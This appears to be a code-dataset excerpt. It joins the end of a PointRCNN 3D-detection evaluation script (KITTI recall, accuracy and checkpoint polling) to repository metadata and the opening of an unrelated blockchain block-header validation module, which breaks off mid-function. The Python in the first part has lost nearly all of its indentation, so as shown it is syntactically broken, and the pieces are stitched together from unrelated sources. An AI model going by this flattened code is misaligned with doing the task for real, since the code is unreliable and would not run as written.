logger.info('rpn iou avg: %f' % (rpn_iou_avg / max(cnt, 1.0)))
ret_dict = {'max_obj_num': max_num, 'rpn_iou': rpn_iou_avg / cnt}
for idx, thresh in enumerate(thresh_list):
cur_recall = total_recalled_bbox_list[idx] / max(total_gt_bbox, 1.0)
logger.info('total bbox recall(thresh=%.3f): %d / %d = %f' % (thresh, total_recalled_bbox_list[idx],
total_gt_bbox, cur_recall))
ret_dict['rpn_recall(thresh=%.2f)' % thresh] = cur_recall
logger.info('result is saved to: %s' % result_dir)
return ret_dict
def eval_one_epoch_rcnn(model, dataloader, epoch_id, result_dir, logger):
np.random.seed(1024)
MEAN_SIZE = torch.from_numpy(cfg.CLS_MEAN_SIZE[0]).cuda()
mode = 'TEST' if args.test else 'EVAL'
final_output_dir = os.path.join(result_dir, 'final_result', 'data')
os.makedirs(final_output_dir, exist_ok=True)
if args.save_result:
roi_output_dir = os.path.join(result_dir, 'roi_result', 'data')
refine_output_dir = os.path.join(result_dir, 'refine_result', 'data')
os.makedirs(roi_output_dir, exist_ok=True)
os.makedirs(refine_output_dir, exist_ok=True)
logger.info('---- EPOCH %s RCNN EVALUATION ----' % epoch_id)
model.eval()
thresh_list = [0.1, 0.3, 0.5, 0.7, 0.9]
total_recalled_bbox_list, total_gt_bbox = [0] * 5, 0
total_roi_recalled_bbox_list = [0] * 5
dataset = dataloader.dataset
cnt = final_total = total_cls_acc = total_cls_acc_refined = 0
progress_bar = tqdm.tqdm(total=len(dataloader), leave=True, desc='eval')
for data in dataloader:
sample_id = data['sample_id']
cnt += 1
assert args.batch_size == 1, 'Only support bs=1 here'
input_data = {}
for key, val in data.items():
if key != 'sample_id':
input_data[key] = torch.from_numpy(val).contiguous().cuda(non_blocking=True).float()
roi_boxes3d = input_data['roi_boxes3d']
roi_scores = input_data['roi_scores']
if cfg.RCNN.ROI_SAMPLE_JIT:
for key, val in input_data.items():
if key in ['gt_iou', 'gt_boxes3d']:
continue
input_data[key] = input_data[key].unsqueeze(dim=0)
else:
pts_input = torch.cat((input_data['pts_input'], input_data['pts_features']), dim=-1)
input_data['pts_input'] = pts_input
ret_dict = model(input_data)
rcnn_cls = ret_dict['rcnn_cls']
rcnn_reg = ret_dict['rcnn_reg']
# bounding box regression
anchor_size = MEAN_SIZE
if cfg.RCNN.SIZE_RES_ON_ROI:
roi_size = input_data['roi_size']
anchor_size = roi_size
pred_boxes3d = decode_bbox_target(roi_boxes3d, rcnn_reg,
anchor_size=anchor_size,
loc_scope=cfg.RCNN.LOC_SCOPE,
loc_bin_size=cfg.RCNN.LOC_BIN_SIZE,
num_head_bin=cfg.RCNN.NUM_HEAD_BIN,
get_xz_fine=True, get_y_by_bin=cfg.RCNN.LOC_Y_BY_BIN,
loc_y_scope=cfg.RCNN.LOC_Y_SCOPE, loc_y_bin_size=cfg.RCNN.LOC_Y_BIN_SIZE,
get_ry_fine=True)
# scoring
if rcnn_cls.shape[1] == 1:
raw_scores = rcnn_cls.view(-1)
norm_scores = torch.sigmoid(raw_scores)
pred_classes = (norm_scores > cfg.RCNN.SCORE_THRESH).long()
else:
pred_classes = torch.argmax(rcnn_cls, dim=1).view(-1)
cls_norm_scores = F.softmax(rcnn_cls, dim=1)
raw_scores = rcnn_cls[:, pred_classes]
norm_scores = cls_norm_scores[:, pred_classes]
# evaluation
disp_dict = {'mode': mode}
if not args.test:
gt_boxes3d = input_data['gt_boxes3d']
gt_iou = input_data['gt_iou']
# calculate recall
gt_num = gt_boxes3d.shape[0]
if gt_num > 0:
iou3d = iou3d_utils.boxes_iou3d_gpu(pred_boxes3d, gt_boxes3d)
gt_max_iou, _ = iou3d.max(dim=0)
refined_iou, _ = iou3d.max(dim=1)
for idx, thresh in enumerate(thresh_list):
total_recalled_bbox_list[idx] += (gt_max_iou > thresh).sum().item()
recalled_num = (gt_max_iou > 0.7).sum().item()
total_gt_bbox += gt_num
iou3d_in = iou3d_utils.boxes_iou3d_gpu(roi_boxes3d, gt_boxes3d)
gt_max_iou_in, _ = iou3d_in.max(dim=0)
for idx, thresh in enumerate(thresh_list):
total_roi_recalled_bbox_list[idx] += (gt_max_iou_in > thresh).sum().item()
# classification accuracy
cls_label = (gt_iou > cfg.RCNN.CLS_FG_THRESH).float()
cls_valid_mask = ((gt_iou >= cfg.RCNN.CLS_FG_THRESH) | (gt_iou <= cfg.RCNN.CLS_BG_THRESH)).float()
cls_acc = ((pred_classes == cls_label.long()).float() * cls_valid_mask).sum() / max(cls_valid_mask.sum(), 1.0)
iou_thresh = 0.7 if cfg.CLASSES == 'Car' else 0.5
cls_label_refined = (gt_iou >= iou_thresh).float()
cls_acc_refined = (pred_classes == cls_label_refined.long()).float().sum() / max(cls_label_refined.shape[0], 1.0)
total_cls_acc += cls_acc.item()
total_cls_acc_refined += cls_acc_refined.item()
disp_dict['recall'] = '%d/%d' % (total_recalled_bbox_list[3], total_gt_bbox)
disp_dict['cls_acc_refined'] = '%.2f' % cls_acc_refined.item()
progress_bar.set_postfix(disp_dict)
progress_bar.update()
image_shape = dataset.get_image_shape(sample_id)
if args.save_result:
# save roi and refine results
roi_boxes3d_np = roi_boxes3d.cpu().numpy()
pred_boxes3d_np = pred_boxes3d.cpu().numpy()
calib = dataset.get_calib(sample_id)
save_kitti_format(sample_id, calib, roi_boxes3d_np, roi_output_dir, roi_scores, image_shape)
save_kitti_format(sample_id, calib, pred_boxes3d_np, refine_output_dir, raw_scores.cpu().numpy(),
image_shape)
# NMS and scoring
# scores thresh
inds = norm_scores > cfg.RCNN.SCORE_THRESH
if inds.sum() == 0:
continue
pred_boxes3d_selected = pred_boxes3d[inds]
raw_scores_selected = raw_scores[inds]
# NMS thresh
boxes_bev_selected = kitti_utils.boxes3d_to_bev_torch(pred_boxes3d_selected)
keep_idx = iou3d_utils.nms_gpu(boxes_bev_selected, raw_scores_selected, cfg.RCNN.NMS_THRESH)
pred_boxes3d_selected = pred_boxes3d_selected[keep_idx]
scores_selected = raw_scores_selected[keep_idx]
pred_boxes3d_selected, scores_selected = pred_boxes3d_selected.cpu().numpy(), scores_selected.cpu().numpy()
calib = dataset.get_calib(sample_id)
final_total += pred_boxes3d_selected.shape[0]
save_kitti_format(sample_id, calib, pred_boxes3d_selected, final_output_dir, scores_selected, image_shape)
progress_bar.close()
# dump empty files
split_file = os.path.join(dataset.imageset_dir, '..', '..', 'ImageSets', dataset.split + '.txt')
split_file = os.path.abspath(split_file)
image_idx_list = [x.strip() for x in open(split_file).readlines()]
empty_cnt = 0
for k in range(image_idx_list.__len__()):
cur_file = os.path.join(final_output_dir, '%s.txt' % image_idx_list[k])
if not os.path.exists(cur_file):
with open(cur_file, 'w') as temp_f:
pass
empty_cnt += 1
logger.info('empty_cnt=%d: dump empty file %s' % (empty_cnt, cur_file))
ret_dict = {'empty_cnt': empty_cnt}
logger.info('-------------------performance of epoch %s---------------------' % epoch_id)
logger.info(str(datetime.now()))
avg_cls_acc = (total_cls_acc / max(cnt, 1.0))
avg_cls_acc_refined = (total_cls_acc_refined / max(cnt, 1.0))
avg_det_num = (final_total / max(cnt, 1.0))
logger.info('final average detections: %.3f' % avg_det_num)
logger.info('final average cls acc: %.3f' % avg_cls_acc)
logger.info('final average cls acc refined: %.3f' % avg_cls_acc_refined)
ret_dict['rcnn_cls_acc'] = avg_cls_acc
ret_dict['rcnn_cls_acc_refined'] = avg_cls_acc_refined
ret_dict['rcnn_avg_num'] = avg_det_num
for idx, thresh in enumerate(thresh_list):
cur_roi_recall = total_roi_recalled_bbox_list[idx] / max(total_gt_bbox, 1.0)
logger.info('total roi bbox recall(thresh=%.3f): %d / %d = %f' % (thresh, total_roi_recalled_bbox_list[idx],
total_gt_bbox, cur_roi_recall))
ret_dict['rpn_recall(thresh=%.2f)' % thresh] = cur_roi_recall
for idx, thresh in enumerate(thresh_list):
cur_recall = total_recalled_bbox_list[idx] / max(total_gt_bbox, 1.0)
logger.info('total bbox recall(thresh=%.3f): %d / %d = %f' % (thresh, total_recalled_bbox_list[idx],
total_gt_bbox, cur_recall))
ret_dict['rcnn_recall(thresh=%.2f)' % thresh] = cur_recall
if cfg.TEST.SPLIT != 'test':
        logger.info('Average Precision:')
name_to_class = {'Car': 0, 'Pedestrian': 1, 'Cyclist': 2}
ap_result_str, ap_dict = kitti_evaluate(dataset.label_dir, final_output_dir, label_split_file=split_file,
current_class=name_to_class[cfg.CLASSES])
logger.info(ap_result_str)
ret_dict.update(ap_dict)
logger.info('result is saved to: %s' % result_dir)
return ret_dict
def eval_one_epoch_joint(model, dataloader, epoch_id, result_dir, logger):
np.random.seed(666)
MEAN_SIZE = torch.from_numpy(cfg.CLS_MEAN_SIZE[0]).cuda()
mode = 'TEST' if args.test else 'EVAL'
final_output_dir = os.path.join(result_dir, 'final_result', 'data')
os.makedirs(final_output_dir, exist_ok=True)
if args.save_result:
roi_output_dir = os.path.join(result_dir, 'roi_result', 'data')
refine_output_dir = os.path.join(result_dir, 'refine_result', 'data')
rpn_output_dir = os.path.join(result_dir, 'rpn_result', 'data')
os.makedirs(rpn_output_dir, exist_ok=True)
os.makedirs(roi_output_dir, exist_ok=True)
os.makedirs(refine_output_dir, exist_ok=True)
logger.info('---- EPOCH %s JOINT EVALUATION ----' % epoch_id)
logger.info('==> Output file: %s' % result_dir)
model.eval()
thresh_list = [0.1, 0.3, 0.5, 0.7, 0.9]
total_recalled_bbox_list, total_gt_bbox = [0] * 5, 0
total_roi_recalled_bbox_list = [0] * 5
dataset = dataloader.dataset
cnt = final_total = total_cls_acc = total_cls_acc_refined = total_rpn_iou = 0
progress_bar = tqdm.tqdm(total=len(dataloader), leave=True, desc='eval')
for data in dataloader:
cnt += 1
sample_id, pts_rect, pts_features, pts_input = \
data['sample_id'], data['pts_rect'], data['pts_features'], data['pts_input']
batch_size = len(sample_id)
inputs = torch.from_numpy(pts_input).cuda(non_blocking=True).float()
input_data = {'pts_input': inputs}
# model inference
ret_dict = model(input_data)
roi_scores_raw = ret_dict['roi_scores_raw'] # (B, M)
roi_boxes3d = ret_dict['rois'] # (B, M, 7)
seg_result = ret_dict['seg_result'].long() # (B, N)
rcnn_cls = ret_dict['rcnn_cls'].view(batch_size, -1, ret_dict['rcnn_cls'].shape[1])
rcnn_reg = ret_dict['rcnn_reg'].view(batch_size, -1, ret_dict['rcnn_reg'].shape[1]) # (B, M, C)
# bounding box regression
anchor_size = MEAN_SIZE
if cfg.RCNN.SIZE_RES_ON_ROI:
assert False
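        # decode the bin-based classification + residual regression outputs back into
        # 7-DoF boxes (x, y, z, h, w, l, ry) in the camera frame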
pred_boxes3d = decode_bbox_target(roi_boxes3d.view(-1, 7), rcnn_reg.view(-1, rcnn_reg.shape[-1]),
anchor_size=anchor_size,
loc_scope=cfg.RCNN.LOC_SCOPE,
loc_bin_size=cfg.RCNN.LOC_BIN_SIZE,
num_head_bin=cfg.RCNN.NUM_HEAD_BIN,
get_xz_fine=True, get_y_by_bin=cfg.RCNN.LOC_Y_BY_BIN,
loc_y_scope=cfg.RCNN.LOC_Y_SCOPE, loc_y_bin_size=cfg.RCNN.LOC_Y_BIN_SIZE,
get_ry_fine=True).view(batch_size, -1, 7)
# scoring
if rcnn_cls.shape[2] == 1:
raw_scores = rcnn_cls # (B, M, 1)
norm_scores = torch.sigmoid(raw_scores)
pred_classes = (norm_scores > cfg.RCNN.SCORE_THRESH).long()
else:
pred_classes = torch.argmax(rcnn_cls, dim=1).view(-1)
cls_norm_scores = F.softmax(rcnn_cls, dim=1)
raw_scores = rcnn_cls[:, pred_classes]
norm_scores = cls_norm_scores[:, pred_classes]
# evaluation
recalled_num = gt_num = rpn_iou = 0
if not args.test:
if not cfg.RPN.FIXED:
rpn_cls_label, rpn_reg_label = data['rpn_cls_label'], data['rpn_reg_label']
rpn_cls_label = torch.from_numpy(rpn_cls_label).cuda(non_blocking=True).long()
gt_boxes3d = data['gt_boxes3d']
for k in range(batch_size):
# calculate recall
cur_gt_boxes3d = gt_boxes3d[k]
tmp_idx = cur_gt_boxes3d.__len__() - 1
while tmp_idx >= 0 and cur_gt_boxes3d[tmp_idx].sum() == 0:
tmp_idx -= 1
if tmp_idx >= 0:
cur_gt_boxes3d = cur_gt_boxes3d[:tmp_idx + 1]
cur_gt_boxes3d = torch.from_numpy(cur_gt_boxes3d).cuda(non_blocking=True).float()
iou3d = iou3d_utils.boxes_iou3d_gpu(pred_boxes3d[k], cur_gt_boxes3d)
gt_max_iou, _ = iou3d.max(dim=0)
refined_iou, _ = iou3d.max(dim=1)
for idx, thresh in enumerate(thresh_list):
total_recalled_bbox_list[idx] += (gt_max_iou > thresh).sum().item()
recalled_num += (gt_max_iou > 0.7).sum().item()
gt_num += cur_gt_boxes3d.shape[0]
total_gt_bbox += cur_gt_boxes3d.shape[0]
# original recall
iou3d_in = iou3d_utils.boxes_iou3d_gpu(roi_boxes3d[k], cur_gt_boxes3d)
gt_max_iou_in, _ = iou3d_in.max(dim=0)
for idx, thresh in enumerate(thresh_list):
total_roi_recalled_bbox_list[idx] += (gt_max_iou_in > thresh).sum().item()
if not cfg.RPN.FIXED:
fg_mask = rpn_cls_label > 0
correct = ((seg_result == rpn_cls_label) & fg_mask).sum().float()
union = fg_mask.sum().float() + (seg_result > 0).sum().float() - correct
rpn_iou = correct / torch.clamp(union, min=1.0)
total_rpn_iou += rpn_iou.item()
disp_dict = {'mode': mode, 'recall': '%d/%d' % (total_recalled_bbox_list[3], total_gt_bbox)}
progress_bar.set_postfix(disp_dict)
progress_bar.update()
if args.save_result:
# save roi and refine results
roi_boxes3d_np = roi_boxes3d.cpu().numpy()
pred_boxes3d_np = pred_boxes3d.cpu().numpy()
roi_scores_raw_np = roi_scores_raw.cpu().numpy()
raw_scores_np = raw_scores.cpu().numpy()
rpn_cls_np = ret_dict['rpn_cls'].cpu().numpy()
rpn_xyz_np = ret_dict['backbone_xyz'].cpu().numpy()
seg_result_np = seg_result.cpu().numpy()
output_data = np.concatenate((rpn_xyz_np, rpn_cls_np.reshape(batch_size, -1, 1),
seg_result_np.reshape(batch_size, -1, 1)), axis=2)
for k in range(batch_size):
cur_sample_id = sample_id[k]
calib = dataset.get_calib(cur_sample_id)
image_shape = dataset.get_image_shape(cur_sample_id)
save_kitti_format(cur_sample_id, calib, roi_boxes3d_np[k], roi_output_dir,
roi_scores_raw_np[k], image_shape)
save_kitti_format(cur_sample_id, calib, pred_boxes3d_np[k], refine_output_dir,
raw_scores_np[k], image_shape)
output_file = os.path.join(rpn_output_dir, '%06d.npy' % cur_sample_id)
np.save(output_file, output_data.astype(np.float32))
# scores thresh
inds = norm_scores > cfg.RCNN.SCORE_THRESH
for k in range(batch_size):
cur_inds = inds[k].view(-1)
if cur_inds.sum() == 0:
continue
pred_boxes3d_selected = pred_boxes3d[k, cur_inds]
raw_scores_selected = raw_scores[k, cur_inds]
norm_scores_selected = norm_scores[k, cur_inds]
# NMS thresh
# rotated nms
boxes_bev_selected = kitti_utils.boxes3d_to_bev_torch(pred_boxes3d_selected)
keep_idx = iou3d_utils.nms_gpu(boxes_bev_selected, raw_scores_selected, cfg.RCNN.NMS_THRESH).view(-1)
pred_boxes3d_selected = pred_boxes3d_selected[keep_idx]
scores_selected = raw_scores_selected[keep_idx]
pred_boxes3d_selected, scores_selected = pred_boxes3d_selected.cpu().numpy(), scores_selected.cpu().numpy()
cur_sample_id = sample_id[k]
calib = dataset.get_calib(cur_sample_id)
final_total += pred_boxes3d_selected.shape[0]
image_shape = dataset.get_image_shape(cur_sample_id)
save_kitti_format(cur_sample_id, calib, pred_boxes3d_selected, final_output_dir, scores_selected, image_shape)
progress_bar.close()
# dump empty files
split_file = os.path.join(dataset.imageset_dir, '..', '..', 'ImageSets', dataset.split + '.txt')
split_file = os.path.abspath(split_file)
image_idx_list = [x.strip() for x in open(split_file).readlines()]
empty_cnt = 0
for k in range(image_idx_list.__len__()):
cur_file = os.path.join(final_output_dir, '%s.txt' % image_idx_list[k])
if not os.path.exists(cur_file):
with open(cur_file, 'w') as temp_f:
pass
empty_cnt += 1
logger.info('empty_cnt=%d: dump empty file %s' % (empty_cnt, cur_file))
ret_dict = {'empty_cnt': empty_cnt}
logger.info('-------------------performance of epoch %s---------------------' % epoch_id)
logger.info(str(datetime.now()))
avg_rpn_iou = (total_rpn_iou / max(cnt, 1.0))
avg_cls_acc = (total_cls_acc / max(cnt, 1.0))
avg_cls_acc_refined = (total_cls_acc_refined / max(cnt, 1.0))
avg_det_num = (final_total / max(len(dataset), 1.0))
logger.info('final average detections: %.3f' % avg_det_num)
logger.info('final average rpn_iou refined: %.3f' % avg_rpn_iou)
logger.info('final average cls acc: %.3f' % avg_cls_acc)
logger.info('final average cls acc refined: %.3f' % avg_cls_acc_refined)
ret_dict['rpn_iou'] = avg_rpn_iou
ret_dict['rcnn_cls_acc'] = avg_cls_acc
ret_dict['rcnn_cls_acc_refined'] = avg_cls_acc_refined
ret_dict['rcnn_avg_num'] = avg_det_num
for idx, thresh in enumerate(thresh_list):
cur_roi_recall = total_roi_recalled_bbox_list[idx] / max(total_gt_bbox, 1.0)
logger.info('total roi bbox recall(thresh=%.3f): %d / %d = %f' % (thresh, total_roi_recalled_bbox_list[idx],
total_gt_bbox, cur_roi_recall))
ret_dict['rpn_recall(thresh=%.2f)' % thresh] = cur_roi_recall
for idx, thresh in enumerate(thresh_list):
cur_recall = total_recalled_bbox_list[idx] / max(total_gt_bbox, 1.0)
logger.info('total bbox recall(thresh=%.3f): %d / %d = %f' % (thresh, total_recalled_bbox_list[idx],
total_gt_bbox, cur_recall))
ret_dict['rcnn_recall(thresh=%.2f)' % thresh] = cur_recall
if cfg.TEST.SPLIT != 'test':
        logger.info('Average Precision:')
name_to_class = {'Car': 0, 'Pedestrian': 1, 'Cyclist': 2}
ap_result_str, ap_dict = kitti_evaluate(dataset.label_dir, final_output_dir, label_split_file=split_file,
current_class=name_to_class[cfg.CLASSES])
logger.info(ap_result_str)
ret_dict.update(ap_dict)
logger.info('result is saved to: %s' % result_dir)
return ret_dict
def eval_one_epoch(model, dataloader, epoch_id, result_dir, logger):
if cfg.RPN.ENABLED and not cfg.RCNN.ENABLED:
ret_dict = eval_one_epoch_rpn(model, dataloader, epoch_id, result_dir, logger)
elif not cfg.RPN.ENABLED and cfg.RCNN.ENABLED:
ret_dict = eval_one_epoch_rcnn(model, dataloader, epoch_id, result_dir, logger)
elif cfg.RPN.ENABLED and cfg.RCNN.ENABLED:
ret_dict = eval_one_epoch_joint(model, dataloader, epoch_id, result_dir, logger)
else:
raise NotImplementedError
return ret_dict
def load_part_ckpt(model, filename, logger, total_keys=-1):
if os.path.isfile(filename):
logger.info("==> Loading part model from checkpoint '{}'".format(filename))
checkpoint = torch.load(filename)
model_state = checkpoint['model_state']
update_model_state = {key: val for key, val in model_state.items() if key in model.state_dict()}
state_dict = model.state_dict()
state_dict.update(update_model_state)
model.load_state_dict(state_dict)
update_keys = update_model_state.keys().__len__()
if update_keys == 0:
raise RuntimeError
logger.info("==> Done (loaded %d/%d)" % (update_keys, total_keys))
else:
raise FileNotFoundError
def load_ckpt_based_on_args(model, logger):
if args.ckpt is not None:
train_utils.load_checkpoint(model, filename=args.ckpt, logger=logger)
total_keys = model.state_dict().keys().__len__()
if cfg.RPN.ENABLED and args.rpn_ckpt is not None:
load_part_ckpt(model, filename=args.rpn_ckpt, logger=logger, total_keys=total_keys)
if cfg.RCNN.ENABLED and args.rcnn_ckpt is not None:
load_part_ckpt(model, filename=args.rcnn_ckpt, logger=logger, total_keys=total_keys)
def eval_single_ckpt(root_result_dir):
root_result_dir = os.path.join(root_result_dir, 'eval')
# set epoch_id and output dir
num_list = re.findall(r'\d+', args.ckpt) if args.ckpt is not None else []
epoch_id = num_list[-1] if num_list.__len__() > 0 else 'no_number'
root_result_dir = os.path.join(root_result_dir, 'epoch_%s' % epoch_id, cfg.TEST.SPLIT)
if args.test:
root_result_dir = os.path.join(root_result_dir, 'test_mode')
if args.extra_tag != 'default':
root_result_dir = os.path.join(root_result_dir, args.extra_tag)
os.makedirs(root_result_dir, exist_ok=True)
log_file = os.path.join(root_result_dir, 'log_eval_one.txt')
logger = create_logger(log_file)
logger.info('**********************Start logging**********************')
for key, val in vars(args).items():
logger.info("{:16} {}".format(key, val))
save_config_to_file(cfg, logger=logger)
# create dataloader & network
test_loader = create_dataloader(logger)
model = PointRCNN(num_classes=test_loader.dataset.num_class, use_xyz=True, mode='TEST')
model.cuda()
# copy important files to backup
backup_dir = os.path.join(root_result_dir, 'backup_files')
os.makedirs(backup_dir, exist_ok=True)
os.system('cp *.py %s/' % backup_dir)
os.system('cp ../lib/net/*.py %s/' % backup_dir)
os.system('cp ../lib/datasets/kitti_rcnn_dataset.py %s/' % backup_dir)
# load checkpoint
load_ckpt_based_on_args(model, logger)
# start evaluation
eval_one_epoch(model, test_loader, epoch_id, root_result_dir, logger)
def get_no_evaluated_ckpt(ckpt_dir, ckpt_record_file):
ckpt_list = glob.glob(os.path.join(ckpt_dir, '*checkpoint_epoch_*.pth'))
ckpt_list.sort(key=os.path.getmtime)
    with open(ckpt_record_file, 'r') as f:
        evaluated_ckpt_list = [float(x.strip()) for x in f.readlines()]
for cur_ckpt in ckpt_list:
num_list = re.findall('checkpoint_epoch_(.*).pth', cur_ckpt)
        if len(num_list) == 0:
continue
epoch_id = num_list[-1]
if float(epoch_id) not in evaluated_ckpt_list and int(float(epoch_id)) >= args.start_epoch:
return epoch_id, cur_ckpt
return -1, None
def repeat_eval_ckpt(root_result_dir, ckpt_dir):
root_result_dir = os.path.join(root_result_dir, 'eval', 'eval_all_' + args.extra_tag)
os.makedirs(root_result_dir, exist_ok=True)
log_file = os.path.join(root_result_dir, 'log_eval_all_%s.txt' % cfg.TEST.SPLIT)
logger = create_logger(log_file)
logger.info('**********************Start logging**********************')
# save config
for key, val in vars(args).items():
logger.info("{:16} {}".format(key, val))
save_config_to_file(cfg, logger=logger)
# create dataloader & network
test_loader = create_dataloader(logger)
model = PointRCNN(num_classes=test_loader.dataset.num_class, use_xyz=True, mode='TEST')
model.cuda()
# copy important files to backup
backup_dir = os.path.join(root_result_dir, 'backup_files')
os.makedirs(backup_dir, exist_ok=True)
os.system('cp *.py %s/' % backup_dir)
os.system('cp ../lib/net/*.py %s/' % backup_dir)
os.system('cp ../lib/datasets/kitti_rcnn_dataset.py %s/' % backup_dir)
# evaluated ckpt record
ckpt_record_file = os.path.join(root_result_dir, 'eval_list_%s.txt' % cfg.TEST.SPLIT)
with open(ckpt_record_file, 'a'):
pass
# tensorboard log
tb_log = SummaryWriter(log_dir=os.path.join(root_result_dir, 'tensorboard_%s' % cfg.TEST.SPLIT))
while True:
# check whether there is checkpoint which is not evaluated
cur_epoch_id, cur_ckpt = get_no_evaluated_ckpt(ckpt_dir, ckpt_record_file)
if cur_epoch_id == -1 or int(float(cur_epoch_id)) < args.start_epoch:
wait_second = 30
            print('Wait %s seconds for next check: %s' % (wait_second, ckpt_dir))
time.sleep(wait_second)
continue
# load checkpoint
train_utils.load_checkpoint(model, filename=cur_ckpt)
# start evaluation
cur_result_dir = os.path.join(root_result_dir, 'epoch_%s' % cur_epoch_id, cfg.TEST.SPLIT)
tb_dict = eval_one_epoch(model, test_loader, cur_epoch_id, cur_result_dir, logger)
step = int(float(cur_epoch_id))
if step == float(cur_epoch_id):
for key, val in tb_dict.items():
tb_log.add_scalar(key, val, step)
# record this epoch which has been evaluated
with open(ckpt_record_file, 'a') as f:
print('%s' % cur_epoch_id, file=f)
logger.info('Epoch %s has been evaluated' % cur_epoch_id)
def create_dataloader(logger):
mode = 'TEST' if args.test else 'EVAL'
DATA_PATH = os.path.join('../../', 'data')
# create dataloader
test_set = KittiRCNNDataset(root_dir=DATA_PATH, npoints=cfg.RPN.NUM_POINTS,
split=cfg.TEST.SPLIT, mode=mode,
random_select=args.random_select,
rcnn_eval_roi_dir=args.rcnn_eval_roi_dir,
rcnn_eval_feature_dir=args.rcnn_eval_feature_dir,
classes=cfg.CLASSES,
logger=logger,
bgr_file=args.rpn_bgr,
mean_covariance_file=args.rpn_mean_covariance)
test_loader = DataLoader(test_set, batch_size=args.batch_size, shuffle=False, pin_memory=True,
num_workers=args.workers, collate_fn=test_set.collate_batch)
return test_loader
if __name__ == "__main__":
# merge config and log to file
if args.cfg_file is not None:
cfg_from_file(args.cfg_file)
if args.set_cfgs is not None:
cfg_from_list(args.set_cfgs)
cfg.TAG = os.path.splitext(os.path.basename(args.cfg_file))[0]
if args.eval_mode == 'rpn':
cfg.RPN.ENABLED = True
cfg.RCNN.ENABLED = False
root_result_dir = os.path.join('../', 'output', 'rpn', cfg.TAG)
ckpt_dir = os.path.join('../', 'output', 'rpn', cfg.TAG, 'ckpt')
elif args.eval_mode == 'rcnn':
cfg.RCNN.ENABLED = True
cfg.RPN.ENABLED = cfg.RPN.FIXED = True
root_result_dir = os.path.join('../', 'output', 'rcnn', cfg.TAG)
ckpt_dir = os.path.join('../', 'output', 'rcnn', cfg.TAG, 'ckpt')
elif args.eval_mode == 'rcnn_offline':
cfg.RCNN.ENABLED = True
cfg.RPN.ENABLED = False
root_result_dir = os.path.join('../', 'output', 'rcnn', cfg.TAG)
ckpt_dir = os.path.join('../', 'output', 'rcnn', cfg.TAG, 'ckpt')
assert args.rcnn_eval_roi_dir is not None and args.rcnn_eval_feature_dir is not None
else:
raise NotImplementedError
if args.ckpt_dir is not None:
ckpt_dir = args.ckpt_dir
if args.output_dir is not None:
root_result_dir = args.output_dir
os.makedirs(root_result_dir, exist_ok=True)
with torch.no_grad():
if args.eval_all:
assert os.path.exists(ckpt_dir), '%s' % ckpt_dir
repeat_eval_ckpt(root_result_dir, ckpt_dir)
else:
eval_single_ckpt(root_result_dir)
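# Hedged usage sketch: the script name and the config/checkpoint paths below are
# hypothetical, but the flags correspond to the argparse options referenced above
# (args.cfg_file, args.eval_mode, args.ckpt, args.batch_size, args.eval_all, ...).
#
#   # evaluate one checkpoint:
#   python eval_script.py --cfg_file cfgs/default.yaml --eval_mode rcnn \
#       --ckpt ../output/rcnn/default/ckpt/checkpoint_epoch_70.pth --batch_size 4
#
#   # keep polling the ckpt dir and evaluate every new checkpoint (repeat_eval_ckpt):
#   python eval_script.py --cfg_file cfgs/default.yaml --eval_mode rcnn --eval_all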
| 45.946154
| 125
| 0.626558
|
babb365f884a236a29073fcb4bae1f9aa9a365a7
| 50,874
|
py
|
Python
|
cunt/consensus/block_header_validation.py
|
CallMeBrado/cunt-blockchain
|
9b140b7e5541f3baffabe02a55b75d9aeb889999
|
[
"Apache-2.0"
] | 7
|
2021-08-09T19:01:51.000Z
|
2021-12-09T04:32:09.000Z
|
cunt/consensus/block_header_validation.py
|
CallMeBrado/cunt-blockchain
|
9b140b7e5541f3baffabe02a55b75d9aeb889999
|
[
"Apache-2.0"
] | 22
|
2021-08-17T04:12:11.000Z
|
2022-03-29T04:10:38.000Z
|
cunt/consensus/block_header_validation.py
|
CallMeBrado/cunt-blockchain
|
9b140b7e5541f3baffabe02a55b75d9aeb889999
|
[
"Apache-2.0"
] | 4
|
2021-09-05T12:04:51.000Z
|
2022-03-15T08:44:32.000Z
|
import dataclasses
import logging
import time
from typing import Optional, Tuple
from blspy import AugSchemeMPL
from cunt.consensus.block_record import BlockRecord
from cunt.consensus.blockchain_interface import BlockchainInterface
from cunt.consensus.constants import ConsensusConstants
from cunt.consensus.deficit import calculate_deficit
from cunt.consensus.difficulty_adjustment import can_finish_sub_and_full_epoch
from cunt.consensus.get_block_challenge import final_eos_is_already_included, get_block_challenge
from cunt.consensus.make_sub_epoch_summary import make_sub_epoch_summary
from cunt.consensus.pot_iterations import (
calculate_ip_iters,
calculate_iterations_quality,
calculate_sp_interval_iters,
calculate_sp_iters,
is_overflow_block,
)
from cunt.consensus.vdf_info_computation import get_signage_point_vdf_info
from cunt.types.blockchain_format.classgroup import ClassgroupElement
from cunt.types.blockchain_format.sized_bytes import bytes32
from cunt.types.blockchain_format.slots import ChallengeChainSubSlot, RewardChainSubSlot, SubSlotProofs
from cunt.types.blockchain_format.vdf import VDFInfo, VDFProof
from cunt.types.end_of_slot_bundle import EndOfSubSlotBundle
from cunt.types.header_block import HeaderBlock
from cunt.types.unfinished_header_block import UnfinishedHeaderBlock
from cunt.util.errors import Err, ValidationError
from cunt.util.hash import std_hash
from cunt.util.ints import uint8, uint32, uint64, uint128
log = logging.getLogger(__name__)
# noinspection PyCallByClass
def validate_unfinished_header_block(
constants: ConsensusConstants,
blocks: BlockchainInterface,
header_block: UnfinishedHeaderBlock,
check_filter: bool,
expected_difficulty: uint64,
expected_sub_slot_iters: uint64,
skip_overflow_last_ss_validation: bool = False,
skip_vdf_is_valid: bool = False,
check_sub_epoch_summary=True,
) -> Tuple[Optional[uint64], Optional[ValidationError]]:
"""
Validates an unfinished header block. This is a block without the infusion VDFs (unfinished)
and without transactions and transaction info (header). Returns (required_iters, error).
This method is meant to validate only the unfinished part of the block. However, the finished_sub_slots
    refers to all sub-slots that were finished from the previous block's infusion point, up to this block's
infusion point. Therefore, in the case where this is an overflow block, and the last sub-slot is not yet
released, header_block.finished_sub_slots will be missing one sub-slot. In this case,
skip_overflow_last_ss_validation must be set to True. This will skip validation of end of slots, sub-epochs,
and lead to other small tweaks in validation.
"""
# 1. Check that the previous block exists in the blockchain, or that it is correct
prev_b = blocks.try_block_record(header_block.prev_header_hash)
genesis_block = prev_b is None
if genesis_block and header_block.prev_header_hash != constants.GENESIS_CHALLENGE:
return None, ValidationError(Err.INVALID_PREV_BLOCK_HASH)
overflow = is_overflow_block(constants, header_block.reward_chain_block.signage_point_index)
if skip_overflow_last_ss_validation and overflow:
if final_eos_is_already_included(header_block, blocks, expected_sub_slot_iters):
